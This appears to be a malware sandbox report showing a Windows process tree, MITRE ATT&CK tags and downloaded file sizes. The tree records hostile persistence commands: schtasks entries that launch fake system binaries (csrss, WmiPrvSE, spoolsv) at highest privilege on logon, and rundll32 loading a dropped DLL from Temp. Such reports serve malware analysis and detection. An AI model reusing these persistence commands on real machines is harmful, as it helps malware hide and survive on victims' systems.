C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 32130A639352AE88114C70E5DFD36E13 E Global\MSI00002⤵
- Loads dropped DLL
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AdobeARM" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM\AdobeARM.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OneDriveStandaloneUpdater" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Resources\OneDriveStandaloneUpdater.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\System32\httpapi\WerFault.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\System32\KBDCZ\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Boot\bg-BG\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Documents and Settings\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MicrosoftEdgeCP" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\resources\MicrosoftEdgeCP.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Documents and Settings\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "setup" /sc ONLOGON /tr "'C:\Boot\en-US\setup.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default\Links\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update1⤵
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess2⤵
- Modifies system executable filetype association
- Adds Run key to start application
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe"3⤵
- Loads dropped DLL
- Modifies registry class
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Reader_sl.exe"1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Enterprise v6
Persistence
Change Default File Association
1Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Winlogon Helper DLL
1Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
6Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
464KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
140KB
-
Filesize
4KB
-
Filesize
116KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
464KB
-
Filesize
184KB
-
Filesize
464KB
-
Filesize
380KB
-
Filesize
1.0MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
464KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
464KB
-
Filesize
464KB
-
Filesize
84KB
-
Filesize
4KB
-
Filesize
308KB
-
Filesize
464KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
100KB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
1.2MB
-
Filesize
1.6MB
-
Filesize
352KB
-
Filesize
188KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
860KB
-
Filesize
848KB
-
Filesize
36KB
-
Filesize
308KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
408KB
-
Filesize
1.3MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
504KB
-
Filesize
44KB
-
Filesize
384KB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
464KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
464KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
1.6MB
-
Filesize
5.5MB
-
Filesize
1.6MB